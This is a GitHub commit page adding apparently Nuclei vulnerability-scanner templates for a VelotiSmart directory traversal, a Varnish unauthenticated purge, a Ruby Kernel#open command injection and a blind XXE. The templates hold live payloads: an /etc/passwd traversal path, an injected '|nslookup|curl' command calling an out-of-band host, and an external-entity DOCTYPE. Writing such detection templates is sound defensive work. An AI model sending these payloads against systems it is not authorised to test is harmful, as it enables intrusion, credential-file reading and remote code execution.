-
Notifications
You must be signed in to change notification settings - Fork 310
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
cf40c46
commit 592aced
Showing
7 changed files
with
163 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241116 | ||
20241117 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
id: cve-2018-14064 | ||
info: | ||
name: VelotiSmart Wifi - Directory Traversal | ||
author: 0x_Akoko | ||
severity: high | ||
reference: | | ||
- https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac | ||
- https://www.exploit-db.com/exploits/45030 | ||
tags: velotismart,lfi | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/../../etc/passwd" | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
id: unauthenticated-cache-purge | ||
info: | ||
name: Varnish Unauthenticated Cache Purge | ||
author: 0xelkomy | ||
severity: low | ||
description: As per guideline one should protect purges with ACLs from unauthorized hosts. | ||
reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html | ||
hackerone: https://hackerone.com/reports/154278 | ||
tags: varnish,misconfig,cache | ||
requests: | ||
- method: PURGE | ||
path: | ||
- "{{BaseURL}}" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '<title>200 Purged</title>' | ||
- '"status": "ok"' | ||
condition: or | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
id: cmdi-ruby-open-rce | ||
|
||
info: | ||
name: Ruby Kernel#open/URI.open RCE | ||
author: pdteam | ||
severity: high | ||
description: | | ||
Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. | ||
reference: | ||
- https://bishopfox.com/blog/ruby-vulnerabilities-exploits | ||
- https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ | ||
tags: cmdi,oast,dast,blind,ruby,rce | ||
|
||
variables: | ||
marker: "{{interactsh-url}}" | ||
|
||
http: | ||
- pre-condition: | ||
- type: dsl | ||
dsl: | ||
- 'method == "GET"' | ||
|
||
stop-at-first-match: true | ||
payloads: | ||
interaction: | ||
- "|nslookup {{marker}}|curl {{marker}}" | ||
|
||
fuzzing: | ||
- part: query | ||
fuzz: | ||
- "{{interaction}}" | ||
|
||
matchers: | ||
- type: word | ||
part: interactsh_protocol | ||
words: | ||
- "dns" | ||
# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
id: cmdi-ruby-open-rce | ||
|
||
info: | ||
name: Ruby Kernel#open/URI.open RCE | ||
author: pdteam | ||
severity: high | ||
description: | | ||
Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. | ||
reference: | ||
- https://bishopfox.com/blog/ruby-vulnerabilities-exploits | ||
- https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ | ||
tags: cmdi,oast,dast,blind,ruby,rce | ||
|
||
variables: | ||
marker: "{{interactsh-url}}" | ||
|
||
http: | ||
- pre-condition: | ||
- type: dsl | ||
dsl: | ||
- 'method == "GET"' | ||
|
||
stop-at-first-match: true | ||
payloads: | ||
interaction: | ||
- "|nslookup {{marker}}|curl {{marker}}" | ||
|
||
fuzzing: | ||
- part: query | ||
fuzz: | ||
- "{{interaction}}" | ||
|
||
matchers: | ||
- type: word | ||
part: interactsh_protocol | ||
words: | ||
- "dns" | ||
# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
id: blind-xxe | ||
|
||
info: | ||
name: Blind XXE | ||
author: geeknik,otterly | ||
severity: high | ||
|
||
variables: | ||
rletter: "{{rand_base(6,'oterly')}}" | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST {{Path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
User-Agent: Mozilla/5.0 (X11; Linux x88_64; rv:68.0) Gecko/20100101 Firefox/68.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | ||
Accept-Language: en-US,en;q=0.5 | ||
Accept-Encoding: gzip,deflate | ||
Referer: {{BaseURL}} | ||
Content-Type: text/xml | ||
Content-Length: 112 | ||
Connection: close | ||
<?xml version="1.0"?> | ||
<!DOCTYPE {{rletter}} SYSTEM "http://{{interactsh-url}}"> | ||
<{{rletter}}>&e1;</{{rletter}}> | ||
redirects: true | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol | ||
words: | ||
- "dns" | ||
- "http" | ||
condition: or |